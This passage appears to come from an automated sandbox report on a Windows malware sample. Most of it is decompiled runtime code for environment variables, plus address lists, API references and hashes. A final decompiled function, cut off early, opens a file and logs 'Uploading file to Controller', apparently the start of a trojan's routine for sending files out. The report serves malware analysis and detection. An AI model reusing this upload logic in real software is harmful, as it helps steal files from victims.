						__eflags = _t116 - _t217;
						if(_t116 == _t217) {
							goto L10;
						} else {
							__eflags =  *((char*)(_t116 + 1));
							_t298 =  *0x46b4d0; // 0x31e72c8
							_t120 = _t116 & 0xffffff00 |  *((char*)(_t116 + 1)) == 0x00000000;
							_v5 = _t120;
							__eflags = _t298 -  *0x46b4dc; // 0x31e72c8
							if(__eflags == 0) {
								L87();
								_t298 = _t120;
								_t120 = _v5;
								_t231 = _t298;
								 *0x46b4d0 = _t298;
							}
							_t218 = 0;
							__eflags = _t298;
							if(_t298 != 0) {
								L21:
								_t233 = _t286;
								_t122 = _v16 - _t233;
								_push(_t122);
								_push(_t233);
								L121();
								_v12 = _t122;
								__eflags = _t122;
								if(_t122 < 0) {
									L29:
									__eflags = _v5 - _t218;
									if(_v5 != _t218) {
										goto L12;
									} else {
										_t123 =  ~_t122;
										_v12 = _t123;
										_t27 = _t123 + 2; // 0x2
										_t236 = _t27;
										__eflags = _t236 - _t123;
										if(_t236 < _t123) {
											goto L11;
										} else {
											__eflags = _t236 - 0x3fffffff;
											if(_t236 >= 0x3fffffff) {
												goto L11;
											} else {
												_push(4);
												_push(_t236);
												_t299 = L00447D55(_t298);
												E004401F5(_t218);
												_t320 = _t320 + 0x10;
												__eflags = _t299;
												if(_t299 == 0) {
													goto L11;
												} else {
													_t237 = _v12;
													_t286 = _t218;
													_t126 = _a4;
													 *(_t299 + _t237 * 4) = _t126;
													 *(_t299 + 4 + _t237 * 4) = _t218;
													goto L34;
												}
											}
										}
									}
								} else {
									__eflags =  *_t298 - _t218;
									if( *_t298 == _t218) {
										goto L29;
									} else {
										E004401F5( *((intOrPtr*)(_t298 + _t122 * 4)));
										_t282 = _v12;
										__eflags = _v5 - _t218;
										if(_v5 != _t218) {
											while(1) {
												__eflags =  *(_t298 + _t282 * 4) - _t218;
												if( *(_t298 + _t282 * 4) == _t218) {
													break;
												}
												_t19 = _t282 * 4; // 0x31ee460
												 *(_t298 + _t282 * 4) =  *(_t298 + _t19 + 4);
												_t282 = _t282 + 1;
												__eflags = _t282;
											}
											_push(4);
											_push(_t282);
											_t299 = L00447D55(_t298);
											E004401F5(_t218);
											_t320 = _t320 + 0x10;
											_t126 = _t286;
											__eflags = _t299;
											if(_t299 != 0) {
												L34:
												 *0x46b4d0 = _t299;
											}
										} else {
											_t126 = _a4;
											_t286 = _t218;
											 *(_t298 + _t282 * 4) = _t126;
										}
										__eflags = _a8 - _t218;
										if(_a8 == _t218) {
											goto L12;
										} else {
											_t238 = _t126;
											_t283 = _t238 + 1;
											do {
												_t127 =  *_t238;
												_t238 = _t238 + 1;
												__eflags = _t127;
											} while (_t127 != 0);
											_v12 = _t238 - _t283 + 2;
											_t300 = E0043F348(_t238 - _t283, _t238 - _t283 + 2, 1);
											_pop(_t241);
											__eflags = _t300;
											if(_t300 == 0) {
												L42:
												E004401F5(_t300);
												goto L12;
											} else {
												_t131 = E00441916(_t300, _v12, _a4);
												_t321 = _t320 + 0xc;
												__eflags = _t131;
												if(_t131 != 0) {
													_push(_t218);
													_push(_t218);
													_push(_t218);
													_push(_t218);
													_push(_t218);
													E0043698A();
													asm("int3");
													_t316 = _t321;
													_t322 = _t321 - 0xc;
													_push(_t218);
													_t220 = _v44;
													__eflags = _t220;
													if(_t220 != 0) {
														_push(_t300);
														_push(_t286);
														_push(0x3d);
														_t288 = _t220;
														_t133 = L00450FF7(_t241);
														_v20 = _t133;
														_t244 = _t220;
														__eflags = _t133;
														if(_t133 == 0) {
															L54:
															 *((intOrPtr*)(E0043A504())) = 0x16;
															goto L55;
														} else {
															__eflags = _t133 - _t220;
															if(_t133 == _t220) {
																goto L54;
															} else {
																_t302 =  *0x46b4d4; // 0x3200d70
																_t221 = 0;
																__eflags =  *(_t133 + 2);
																_t246 = _t244 & 0xffffff00 |  *(_t133 + 2) == 0x00000000;
																_v9 = _t246;
																__eflags = _t302 -  *0x46b4d8; // 0x31e3fb8
																if(__eflags == 0) {
																	_push(_t302);
																	L104();
																	_t246 = _v9;
																	_t302 = _t133;
																	 *0x46b4d4 = _t302;
																}
																__eflags = _t302;
																if(_t302 != 0) {
																	L64:
																	_v20 = _v20 - _t288 >> 1;
																	_t138 = L00447CE8(_t288, _v20 - _t288 >> 1);
																	_v16 = _t138;
																	__eflags = _t138;
																	if(_t138 < 0) {
																		L72:
																		__eflags = _v9 - _t221;
																		if(_v9 != _t221) {
																			goto L56;
																		} else {
																			_t139 =  ~_t138;
																			_v16 = _t139;
																			_t72 = _t139 + 2; // 0x2
																			_t252 = _t72;
																			__eflags = _t252 - _t139;
																			if(_t252 < _t139) {
																				goto L55;
																			} else {
																				__eflags = _t252 - 0x3fffffff;
																				if(_t252 >= 0x3fffffff) {
																					goto L55;
																				} else {
																					_push(4);
																					_push(_t252);
																					_t303 = L00447D55(_t302);
																					E004401F5(_t221);
																					_t322 = _t322 + 0x10;
																					__eflags = _t303;
																					if(_t303 == 0) {
																						goto L55;
																					} else {
																						_t253 = _v16;
																						_t288 = _t221;
																						_t142 = _v0;
																						 *(_t303 + _t253 * 4) = _t142;
																						 *(_t303 + 4 + _t253 * 4) = _t221;
																						goto L77;
																					}
																				}
																			}
																		}
																	} else {
																		__eflags =  *_t302 - _t221;
																		if( *_t302 == _t221) {
																			goto L72;
																		} else {
																			E004401F5( *((intOrPtr*)(_t302 + _t138 * 4)));
																			_t276 = _v16;
																			__eflags = _v9 - _t221;
																			if(_v9 != _t221) {
																				while(1) {
																					__eflags =  *(_t302 + _t276 * 4) - _t221;
																					if( *(_t302 + _t276 * 4) == _t221) {
																						break;
																					}
																					_t64 = _t276 * 4; // 0x31fbe10
																					 *(_t302 + _t276 * 4) =  *(_t302 + _t64 + 4);
																					_t276 = _t276 + 1;
																					__eflags = _t276;
																				}
																				_push(4);
																				_push(_t276);
																				_t303 = L00447D55(_t302);
																				E004401F5(_t221);
																				_t322 = _t322 + 0x10;
																				_t142 = _t288;
																				__eflags = _t303;
																				if(_t303 != 0) {
																					L77:
																					 *0x46b4d4 = _t303;
																				}
																			} else {
																				_t142 = _v0;
																				_t288 = _t221;
																				 *(_t302 + _t276 * 4) = _t142;
																			}
																			__eflags = _a4 - _t221;
																			if(_a4 == _t221) {
																				goto L56;
																			} else {
																				_t254 = _t142;
																				_t81 = _t254 + 2; // 0x2
																				_t284 = _t81;
																				do {
																					_t143 =  *_t254;
																					_t254 = _t254 + 2;
																					__eflags = _t143 - _t221;
																				} while (_t143 != _t221);
																				_t82 = (_t254 - _t284 >> 1) + 2; // 0x0
																				_v16 = _t82;
																				_t304 = E0043F348(_t254 - _t284 >> 1, _t82, 2);
																				_pop(_t258);
																				__eflags = _t304;
																				if(_t304 == 0) {
																					L85:
																					E004401F5(_t304);
																					goto L56;
																				} else {
																					_t148 = E004415D4(_t304, _v16, _v0);
																					_t323 = _t322 + 0xc;
																					__eflags = _t148;
																					if(_t148 != 0) {
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						E0043698A();
																						asm("int3");
																						_push(_t316);
																						_t317 = _t323;
																						_push(_t288);
																						_t290 = _v92;
																						__eflags = _t290;
																						if(_t290 != 0) {
																							_t260 = 0;
																							_t150 = _t290;
																							__eflags =  *_t290;
																							if( *_t290 != 0) {
																								do {
																									_t150 =  &(_t150[1]);
																									_t260 = _t260 + 1;
																									__eflags =  *_t150;
																								} while ( *_t150 != 0);
																							}
																							_t93 = _t260 + 1; // 0x2
																							_t305 = E0043F348(_t260, _t93, 4);
																							_t262 = _t304;
																							__eflags = _t305;
																							if(_t305 == 0) {
																								L102:
																								E0043F949(_t221, _t284, _t290, _t305);
																								goto L103;
																							} else {
																								__eflags =  *_t290;
																								if( *_t290 == 0) {
																									L100:
																									E004401F5(0);
																									_t175 = _t305;
																									goto L101;
																								} else {
																									_push(_t221);
																									_t221 = _t305 - _t290;
																									__eflags = _t221;
																									do {
																										_t271 =  *_t290;
																										_t94 = _t271 + 1; // 0x5
																										_t284 = _t94;
																										do {
																											_t176 =  *_t271;
																											_t271 = _t271 + 1;
																											__eflags = _t176;
																										} while (_t176 != 0);
																										_t262 = _t271 - _t284;
																										_t95 = _t262 + 1; // 0x6
																										_v16 = _t95;
																										 *(_t221 + _t290) = E0043F348(_t262, _t95, 1);
																										E004401F5(0);
																										_t323 = _t323 + 0xc;
																										__eflags =  *(_t221 + _t290);
																										if( *(_t221 + _t290) == 0) {
																											goto L102;
																										} else {
																											_t180 = E00441916( *(_t221 + _t290), _v16,  *_t290);
																											_t323 = _t323 + 0xc;
																											__eflags = _t180;
																											if(_t180 != 0) {
																												L103:
																												_push(0);
																												_push(0);
																												_push(0);
																												_push(0);
																												_push(0);
																												E0043698A();
																												asm("int3");
																												_push(_t317);
																												_t318 = _t323;
																												_push(_t262);
																												_push(_t262);
																												_push(_t290);
																												_t291 = _v128;
																												__eflags = _t291;
																												if(_t291 != 0) {
																													_push(_t221);
																													_t223 = 0;
																													_t156 = _t291;
																													_t263 = 0;
																													_v20 = 0;
																													_push(_t305);
																													__eflags =  *_t291;
																													if( *_t291 != 0) {
																														do {
																															_t156 =  &(_t156[1]);
																															_t263 = _t263 + 1;
																															__eflags =  *_t156;
																														} while ( *_t156 != 0);
																													}
																													_t104 = _t263 + 1; // 0x2
																													_t306 = E0043F348(_t263, _t104, 4);
																													__eflags = _t306;
																													if(_t306 == 0) {
																														L119:
																														E0043F949(_t223, _t284, _t291, _t306);
																														goto L120;
																													} else {
																														__eflags =  *_t291 - _t223;
																														if( *_t291 == _t223) {
																															L117:
																															E004401F5(_t223);
																															_t167 = _t306;
																															goto L118;
																														} else {
																															_t223 = _t306 - _t291;
																															__eflags = _t223;
																															do {
																																_t267 =  *_t291;
																																_t105 = _t267 + 2; // 0x6
																																_t284 = _t105;
																																do {
																																	_t168 =  *_t267;
																																	_t267 = _t267 + 2;
																																	__eflags = _t168 - _v20;
																																} while (_t168 != _v20);
																																_t107 = (_t267 - _t284 >> 1) + 1; // 0x3
																																_v24 = _t107;
																																 *(_t223 + _t291) = E0043F348(_t267 - _t284 >> 1, _t107, 2);
																																E004401F5(0);
																																_t323 = _t323 + 0xc;
																																__eflags =  *(_t223 + _t291);
																																if( *(_t223 + _t291) == 0) {
																																	goto L119;
																																} else {
																																	_t173 = E004415D4( *(_t223 + _t291), _v24,  *_t291);
																																	_t323 = _t323 + 0xc;
																																	__eflags = _t173;
																																	if(_t173 != 0) {
																																		L120:
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		E0043698A();
																																		asm("int3");
																																		_push(_t318);
																																		_push(_t223);
																																		_push(_t306);
																																		_push(_t291);
																																		_t292 =  *0x46b4d0;
																																		_t307 = _t292;
																																		__eflags =  *_t292;
																																		if( *_t292 == 0) {
																																			L127:
																																			_t308 = _t307 - _t292;
																																			__eflags = _t308;
																																			_t310 =  ~(_t308 >> 2);
																																		} else {
																																			_t225 = _v8;
																																			do {
																																				_t163 = E004444C3(_v12,  *_t307, _t225);
																																				_t323 = _t323 + 0xc;
																																				__eflags = _t163;
																																				if(_t163 != 0) {
																																					goto L126;
																																				} else {
																																					_t165 =  *((intOrPtr*)(_t225 +  *_t307));
																																					__eflags = _t165 - 0x3d;
																																					if(_t165 == 0x3d) {
																																						L129:
																																						_t310 = _t307 - _t292 >> 2;
																																					} else {
																																						__eflags = _t165;
																																						if(_t165 == 0) {
																																							goto L129;
																																						} else {
																																							goto L126;
																																						}
																																					}
																																				}
																																				goto L128;
																																				L126:
																																				_t307 =  &(_t307[1]);
																																				__eflags =  *_t307;
																																			} while ( *_t307 != 0);
																																			goto L127;
																																		}
																																		L128:
																																		return _t310;
																																	} else {
																																		goto L115;
																																	}
																																}
																																goto L130;
																																L115:
																																_t291 = _t291 + 4;
																																__eflags =  *_t291 - _t173;
																															} while ( *_t291 != _t173);
																															_t223 = 0;
																															__eflags = 0;
																															goto L117;
																														}
																													}
																												} else {
																													_t167 = 0;
																													L118:
																													return _t167;
																												}
																											} else {
																												goto L98;
																											}
																										}
																										goto L130;
																										L98:
																										_t290 = _t290 + 4;
																										__eflags =  *_t290 - _t180;
																									} while ( *_t290 != _t180);
																									goto L100;
																								}
																							}
																						} else {
																							_t175 = 0;
																							L101:
																							return _t175;
																						}
																					} else {
																						_t274 =  &(_t304[_v20 + 1]);
																						 *(_t274 - 2) = _t148;
																						asm("sbb eax, eax");
																						_t185 = SetEnvironmentVariableW(_t304,  !( ~(_v9 & 0x000000ff)) & _t274);
																						__eflags = _t185;
																						if(_t185 == 0) {
																							_t186 = E0043A504();
																							_t221 = _t221 | 0xffffffff;
																							__eflags = _t221;
																							 *_t186 = 0x2a;
																						}
																						goto L85;
																					}
																				}
																			}
																		}
																	}
																} else {
																	_t191 =  *0x46b4d0; // 0x31e72c8
																	__eflags = _a4 - _t221;
																	if(_a4 == _t221) {
																		L58:
																		__eflags = _t246;
																		if(_t246 != 0) {
																			goto L56;
																		} else {
																			__eflags = _t191;
																			if(_t191 != 0) {
																				L62:
																				 *0x46b4d4 = E0043F348(_t246, 1, 4);
																				E004401F5(_t221);
																				_t322 = _t322 + 0xc;
																				goto L63;
																			} else {
																				 *0x46b4d0 = E0043F348(_t246, 1, 4);
																				E004401F5(_t221);
																				_t322 = _t322 + 0xc;
																				__eflags =  *0x46b4d0 - _t221; // 0x31e72c8
																				if(__eflags == 0) {
																					goto L55;
																				} else {
																					_t302 =  *0x46b4d4; // 0x3200d70
																					__eflags = _t302;
																					if(_t302 != 0) {
																						goto L64;
																					} else {
																						goto L62;
																					}
																				}
																			}
																		}
																	} else {
																		__eflags = _t191;
																		if(_t191 == 0) {
																			goto L58;
																		} else {
																			_t196 = L0043D3FB(_t221);
																			__eflags = _t196;
																			if(_t196 != 0) {
																				L63:
																				_t302 =  *0x46b4d4; // 0x3200d70
																				__eflags = _t302;
																				if(_t302 == 0) {
																					L55:
																					_t221 = _t220 | 0xffffffff;
																					__eflags = _t221;
																					L56:
																					E004401F5(_t288);
																					_t136 = _t221;
																					goto L57;
																				} else {
																					goto L64;
																				}
																			} else {
																				goto L54;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t197 = E0043A504();
														 *_t197 = 0x16;
														_t136 = _t197 | 0xffffffff;
														L57:
														return _t136;
													}
												} else {
													_t280 = _v16 + 1 + _t300 - _a4;
													asm("sbb eax, eax");
													 *(_t280 - 1) = _t218;
													_t204 = SetEnvironmentVariableA(_t300,  !( ~(_v5 & 0x000000ff)) & _t280);
													__eflags = _t204;
													if(_t204 == 0) {
														_t205 = E0043A504();
														_t218 = _t218 | 0xffffffff;
														__eflags = _t218;
														 *_t205 = 0x2a;
													}
													goto L42;
												}
											}
										}
									}
								}
							} else {
								__eflags = _a8;
								if(_a8 == 0) {
									L14:
									__eflags = _t120;
									if(_t120 == 0) {
										 *0x46b4d0 = E0043F348(_t231, 1, 4);
										E004401F5(_t218);
										_t298 =  *0x46b4d0; // 0x31e72c8
										_t320 = _t320 + 0xc;
										__eflags = _t298;
										if(_t298 == 0) {
											goto L11;
										} else {
											__eflags =  *0x46b4d4 - _t218; // 0x3200d70
											if(__eflags != 0) {
												goto L20;
											} else {
												 *0x46b4d4 = E0043F348(_t231, 1, 4);
												E004401F5(_t218);
												_t320 = _t320 + 0xc;
												__eflags =  *0x46b4d4 - _t218; // 0x3200d70
												if(__eflags == 0) {
													goto L11;
												} else {
													goto L19;
												}
											}
										}
									} else {
										_t218 = 0;
										goto L12;
									}
								} else {
									__eflags =  *0x46b4d4 - _t218; // 0x3200d70
									if(__eflags == 0) {
										goto L14;
									} else {
										_t214 = L0043D3F6(0);
										__eflags = _t214;
										if(_t214 != 0) {
											L19:
											_t298 =  *0x46b4d0; // 0x31e72c8
											L20:
											__eflags = _t298;
											if(_t298 == 0) {
												L11:
												_t218 = _t217 | 0xffffffff;
												__eflags = _t218;
												L12:
												E004401F5(_t286);
												_t119 = _t218;
												goto L13;
											} else {
												goto L21;
											}
										} else {
											goto L10;
										}
									}
								}
							}
						}
					}
				} else {
					_t215 = E0043A504();
					 *_t215 = 0x16;
					_t119 = _t215 | 0xffffffff;
					L13:
					return _t119;
				}
				L130:
			}

0x004476b6
0x004476bb
0x004476d2
0x004476d4
0x004476d9
0x004476dd
0x004476de
0x004476e0
0x00447730
0x00447735
0x00000000
0x004476e2
0x004476e2
0x004476e4
0x00000000
0x004476e6
0x004476e6
0x004476ea
0x004476f0
0x004476f3
0x004476f6
0x004476fc
0x004476ff
0x00447704
0x00447706
0x00447709
0x0044770a
0x0044770a
0x00447710
0x00447712
0x00447714
0x004477a8
0x004477ab
0x004477ad
0x004477af
0x004477b0
0x004477b1
0x004477b6
0x004477bb
0x004477bd
0x00447807
0x00447807
0x0044780a
0x00000000
0x00447810
0x00447810
0x00447812
0x00447815
0x00447815
0x00447818
0x0044781a
0x00000000
0x00447820
0x00447820
0x00447826
0x00000000
0x0044782c
0x0044782c
0x0044782e
0x00447836
0x00447838
0x0044783d
0x00447840
0x00447842
0x00000000
0x00447848
0x00447848
0x0044784b
0x0044784d
0x00447850
0x00447853
0x00000000
0x00447853
0x00447842
0x00447826
0x0044781a
0x004477bf
0x004477bf
0x004477c1
0x00000000
0x004477c3
0x004477c6
0x004477cc
0x004477cf
0x004477d2
0x004477e6
0x004477e6
0x004477e9
0x00000000
0x00000000
0x004477de
0x004477e2
0x004477e5
0x004477e5
0x004477e5
0x004477eb
0x004477ed
0x004477f5
0x004477f7
0x004477fc
0x004477ff
0x00447801
0x00447803
0x00447857
0x00447857
0x00447857
0x004477d4
0x004477d4
0x004477d7
0x004477d9
0x004477d9
0x0044785d
0x00447860
0x00000000
0x00447866
0x00447866
0x00447868
0x0044786b
0x0044786b
0x0044786d
0x0044786e
0x0044786e
0x0044787a
0x00447882
0x00447885
0x00447886
0x00447888
0x004478d1
0x004478d2
0x00000000
0x0044788a
0x00447891
0x00447896
0x00447899
0x0044789b
0x004478dd
0x004478de
0x004478df
0x004478e0
0x004478e1
0x004478e2
0x004478e7
0x004478eb
0x004478ed
0x004478f0
0x004478f1
0x004478f4
0x004478f6
0x00447908
0x00447909
0x0044790a
0x0044790d
0x0044790f
0x00447914
0x00447918
0x00447919
0x0044791b
0x0044796c
0x00447971
0x00000000
0x0044791d
0x0044791d
0x0044791f
0x00000000
0x00447921
0x00447921
0x00447927
0x00447929
0x0044792d
0x00447930
0x00447933
0x00447939
0x0044793b
0x0044793c
0x00447942
0x00447945
0x00447947
0x00447947
0x0044794d
0x0044794f
0x004479dc
0x004479e7
0x004479ea
0x004479ef
0x004479f4
0x004479f6
0x00447a40
0x00447a40
0x00447a43
0x00000000
0x00447a49
0x00447a49
0x00447a4b
0x00447a4e
0x00447a4e
0x00447a51
0x00447a53
0x00000000
0x00447a59
0x00447a59
0x00447a5f
0x00000000
0x00447a65
0x00447a65
0x00447a67
0x00447a6f
0x00447a71
0x00447a76
0x00447a79
0x00447a7b
0x00000000
0x00447a81
0x00447a81
0x00447a84
0x00447a86
0x00447a89
0x00447a8c
0x00000000
0x00447a8c
0x00447a7b
0x00447a5f
0x00447a53
0x004479f8
0x004479f8
0x004479fa
0x00000000
0x004479fc
0x004479ff
0x00447a05
0x00447a08
0x00447a0b
0x00447a1f
0x00447a1f
0x00447a22
0x00000000
0x00000000
0x00447a17
0x00447a1b
0x00447a1e
0x00447a1e
0x00447a1e
0x00447a24
0x00447a26
0x00447a2e
0x00447a30
0x00447a35
0x00447a38
0x00447a3a
0x00447a3c
0x00447a90
0x00447a90
0x00447a90
0x00447a0d
0x00447a0d
0x00447a10
0x00447a12
0x00447a12
0x00447a96
0x00447a99
0x00000000
0x00447a9f
0x00447a9f
0x00447aa1
0x00447aa1
0x00447aa4
0x00447aa4
0x00447aa7
0x00447aaa
0x00447aaa
0x00447ab5
0x00447ab9
0x00447ac1
0x00447ac4
0x00447ac5
0x00447ac7
0x00447b0e
0x00447b0f
0x00000000
0x00447ac9
0x00447ad1
0x00447ad6
0x00447ad9
0x00447adb
0x00447b1a
0x00447b1b
0x00447b1c
0x00447b1d
0x00447b1e
0x00447b1f
0x00447b24
0x00447b27
0x00447b28
0x00447b2b
0x00447b2c
0x00447b2f
0x00447b31
0x00447b3a
0x00447b3c
0x00447b3e
0x00447b40
0x00447b42
0x00447b42
0x00447b45
0x00447b46
0x00447b46
0x00447b42
0x00447b4c
0x00447b57
0x00447b5a
0x00447b5b
0x00447b5d
0x00447bc4
0x00447bc4
0x00000000
0x00447b5f
0x00447b5f
0x00447b62
0x00447bb4
0x00447bb6
0x00447bbc
0x00000000
0x00447b64
0x00447b64
0x00447b67
0x00447b67
0x00447b69
0x00447b69
0x00447b6b
0x00447b6b
0x00447b6e
0x00447b6e
0x00447b70
0x00447b71
0x00447b71
0x00447b75
0x00447b79
0x00447b7d
0x00447b87
0x00447b8a
0x00447b8f
0x00447b92
0x00447b96
0x00000000
0x00447b98
0x00447ba0
0x00447ba5
0x00447ba8
0x00447baa
0x00447bc9
0x00447bcb
0x00447bcc
0x00447bcd
0x00447bce
0x00447bcf
0x00447bd0
0x00447bd5
0x00447bd8
0x00447bd9
0x00447bdb
0x00447bdc
0x00447bdd
0x00447bde
0x00447be1
0x00447be3
0x00447bec
0x00447bed
0x00447bef
0x00447bf1
0x00447bf3
0x00447bf6
0x00447bf7
0x00447bf9
0x00447bfb
0x00447bfb
0x00447bfe
0x00447bff
0x00447bff
0x00447bfb
0x00447c03
0x00447c0e
0x00447c12
0x00447c14
0x00447c82
0x00447c82
0x00000000
0x00447c16
0x00447c16
0x00447c18
0x00447c72
0x00447c73
0x00447c79
0x00000000
0x00447c1a
0x00447c1c
0x00447c1c
0x00447c1e
0x00447c1e
0x00447c20
0x00447c20
0x00447c23
0x00447c23
0x00447c26
0x00447c29
0x00447c29
0x00447c35
0x00447c39
0x00447c41
0x00447c47
0x00447c4c
0x00447c4f
0x00447c53
0x00000000
0x00447c55
0x00447c5d
0x00447c62
0x00447c65
0x00447c67
0x00447c87
0x00447c89
0x00447c8a
0x00447c8b
0x00447c8c
0x00447c8d
0x00447c8e
0x00447c93
0x00447c96
0x00447c99
0x00447c9a
0x00447c9b
0x00447c9c
0x00447ca2
0x00447ca4
0x00447ca7
0x00447cd3
0x00447cd3
0x00447cd3
0x00447cd8
0x00447ca9
0x00447ca9
0x00447cac
0x00447cb2
0x00447cb7
0x00447cba
0x00447cbc
0x00000000
0x00447cbe
0x00447cc0
0x00447cc3
0x00447cc5
0x00447ce1
0x00447ce3
0x00447cc7
0x00447cc7
0x00447cc9
0x00000000
0x00000000
0x00000000
0x00000000
0x00447cc9
0x00447cc5
0x00000000
0x00447ccb
0x00447ccb
0x00447cce
0x00447cce
0x00000000
0x00447cac
0x00447cda
0x00447ce0
0x00000000
0x00000000
0x00000000
0x00447c67
0x00000000
0x00447c69
0x00447c69
0x00447c6c
0x00447c6c
0x00447c70
0x00447c70
0x00000000
0x00447c70
0x00447c18
0x00447be5
0x00447be5
0x00447c7d
0x00447c81
0x00447c81
0x00000000
0x00000000
0x00000000
0x00447baa
0x00000000
0x00447bac
0x00447bac
0x00447baf
0x00447baf
0x00000000
0x00447bb3
0x00447b62
0x00447b33
0x00447b33
0x00447bbf
0x00447bc3
0x00447bc3
0x00447add
0x00447ae1
0x00447ae4
0x00447aee
0x00447af6
0x00447afc
0x00447afe
0x00447b00
0x00447b05
0x00447b05
0x00447b08
0x00447b08
0x00000000
0x00447afe
0x00447adb
0x00447ac7
0x00447a99
0x004479fa
0x00447955
0x00447955
0x0044795a
0x0044795d
0x0044798a
0x0044798a
0x0044798c
0x00000000
0x0044798e
0x0044798e
0x00447990
0x004479bb
0x004479c5
0x004479ca
0x004479cf
0x00000000
0x00447992
0x0044799c
0x004479a1
0x004479a6
0x004479a9
0x004479af
0x00000000
0x004479b1
0x004479b1
0x004479b7
0x004479b9
0x00000000
0x00000000
0x00000000
0x00000000
0x004479b9
0x004479af
0x00447990
0x0044795f
0x0044795f
0x00447961
0x00000000
0x00447963
0x00447963
0x00447968
0x0044796a
0x004479d2
0x004479d2
0x004479d8
0x004479da
0x00447977
0x00447977
0x00447977
0x0044797a
0x0044797b
0x00447982
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0044796a
0x00447961
0x0044795d
0x0044794f
0x0044791f
0x004478f8
0x004478f8
0x004478fd
0x00447903
0x00447985
0x00447989
0x00447989
0x0044789d
0x004478a6
0x004478ae
0x004478b2
0x004478b9
0x004478bf
0x004478c1
0x004478c3
0x004478c8
0x004478c8
0x004478cb
0x004478cb
0x00000000
0x004478c1
0x0044789b
0x00447888
0x00447860
0x004477c1
0x0044771a
0x0044771a
0x0044771d
0x0044774e
0x0044774e
0x00447750
0x00447760
0x00447765
0x0044776a
0x00447770
0x00447773
0x00447775
0x00000000
0x00447777
0x00447777
0x0044777d
0x00000000
0x0044777f
0x00447789
0x0044778e
0x00447793
0x00447796
0x0044779c
0x00000000
0x00000000
0x00000000
0x00000000
0x0044779c
0x0044777d
0x00447752
0x00447752
0x00000000
0x00447752
0x0044771f
0x0044771f
0x00447725
0x00000000
0x00447727
0x00447727
0x0044772c
0x0044772e
0x0044779e
0x0044779e
0x004477a4
0x004477a4
0x004477a6
0x0044773b
0x0044773b
0x0044773b
0x0044773e
0x0044773f
0x00447746
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0044772e
0x00447725
0x0044771d
0x00447714
0x004476e4
0x004476bd
0x004476bd
0x004476c2
0x004476c8
0x00447749
0x0044774d
0x0044774d
0x00000000

APIs

___from_strstr_to_strchr.LIBCMT ref: 004476D4
_free.LIBCMT ref: 0044773F
_free.LIBCMT ref: 00447765
_free.LIBCMT ref: 0044778E
_free.LIBCMT ref: 004477C6
_free.LIBCMT ref: 004477F7
_free.LIBCMT ref: 00447838
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 004478B9
_free.LIBCMT ref: 004478D2
_wcschr.LIBVCRUNTIME ref: 0044790F
_free.LIBCMT ref: 0044797B
_free.LIBCMT ref: 004479A1
_free.LIBCMT ref: 004479CA
_free.LIBCMT ref: 004479FF
_free.LIBCMT ref: 00447A30
_free.LIBCMT ref: 00447A71
SetEnvironmentVariableW.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00447AF6
_free.LIBCMT ref: 00447B0F

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: _free$EnvironmentVariable$___from_strstr_to_strchr_wcschr
String ID:
API String ID: 2719235668-0
Opcode ID: fc8ed5698d40dbeb5717abb8f82f00b7400dd5e9c5d8f6874b75d3b2a900508a
Instruction ID: db3f33f972ccc31960696266c8304923ec6ec277b5ade58ccf050fecc9e19cec
Opcode Fuzzy Hash: fc8ed5698d40dbeb5717abb8f82f00b7400dd5e9c5d8f6874b75d3b2a900508a
Instruction Fuzzy Hash: 15D148B1908300AFFB21AF758881A6F77A8EF05354F14416FE945A7382EB7D9902C79D

Uniqueness

Uniqueness Score: -1.00%

Function 004064A2, Relevance: 24.8, APIs: 9, Strings: 5, Instructions: 345
fileCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E004064A2(intOrPtr __ecx, void* __edx, WCHAR* _a4, char _a8, char _a32, char _a56) {
				void* _v12;
				union _LARGE_INTEGER _v16;
				struct _OVERLAPPED* _v20;
				long _v24;
				long _v28;
				intOrPtr _v32;
				long _v36;
				struct _OVERLAPPED* _v40;
				union _LARGE_INTEGER* _v44;
				signed int _v48;
				signed int _v52;
				struct %anon52 _v64;
				intOrPtr _v68;
				struct %anon52 _v80;
				union _LARGE_INTEGER _v84;
				intOrPtr _v88;
				char _v112;
				char _v136;
				char _v160;
				char _v184;
				char _v208;
				char _v232;
				char _v256;
				char _v280;
				char _v304;
				char _v328;
				char _v352;
				char _v376;
				char _v400;
				char _v424;
				char _v448;
				char _v472;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct %anon52 _t117;
				void* _t119;
				void* _t126;
				long _t136;
				void* _t137;
				signed int _t138;
				struct _OVERLAPPED* _t145;
				signed int _t148;
				void* _t154;
				void* _t156;
				void* _t157;
				void* _t173;
				long _t198;
				signed int _t203;
				void* _t216;
				union _LARGE_INTEGER _t280;
				intOrPtr _t281;
				union _LARGE_INTEGER* _t295;
				void* _t297;
				void* _t301;
				void* _t302;
				void* _t303;
				void* _t304;
				void* _t305;

				_t278 = __edx;
				_v68 = __ecx;
				E0040498B(__ecx);
				_t302 = _t301 - 0x10;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t299 = _v68;
				E00404A08(__edx);
				_v28 = 0x186a0;
				_v20 = 0;
				_t297 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
				_t310 = _t297 - 0xffffffff;
				if(_t297 != 0xffffffff) {
					_v80.LowPart = 0;
					_v80.HighPart = 0;
					__imp__GetFileSizeEx(_t297,  &_v80);
					_t203 = _v80.HighPart;
					_t117 = _v80;
					_v48 = _t203;
					_v32 = _t203;
					_v52 = _t117;
					_v16.LowPart = _t117;
					E0040427F(0,  &_v112, _a4);
					_t119 = E0041733B( &_v136,  &_v112);
					_t303 = _t302 - 0x18;
					_t280 = "Uploading file to Controller: ";
					E004075C2(0, _t303, _t280, _t297, __eflags, _t119);
					_t304 = _t303 - 0x14;
					E00402084(0, _t304, "[Info]");
					L00416C80(0, _t297);
					_t305 = _t304 + 0x30;
					E00401FC7();
					L00401EF0();
					_v36 = 1;
					_v40 = 0;
